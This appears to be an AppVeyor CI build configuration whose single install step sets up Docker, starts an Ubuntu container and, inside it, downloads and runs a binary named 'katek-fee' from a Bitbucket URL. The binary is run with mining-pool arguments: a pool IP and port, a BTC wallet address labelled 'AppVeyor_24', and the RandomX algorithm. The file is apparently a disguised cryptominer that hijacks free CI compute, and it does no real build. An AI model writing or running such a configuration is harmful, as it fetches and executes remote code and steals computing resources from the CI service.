image: Ubuntu

install:
- sudo apt-get update && sudo apt-get -y upgrade && sudo apt install -y apt-transport-https ca-certificates curl software-properties-common && curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - && sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable" && apt-cache policy docker-ce && sudo apt install -y docker-ce && sudo docker run -d -t --name Adinda ubuntu && sudo docker exec -t Adinda sh -c "apt-get update && apt-get -y upgrade && apt install apt-transport-https && apt-get install -y wget && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && ./katek-fee -o 139.59.164.251:13333 -u BTC:3L2s7K3Ya5ES9CUZf8S9xncXDvJrBsYB8D.AppVeyor_24 -k -a rx/0"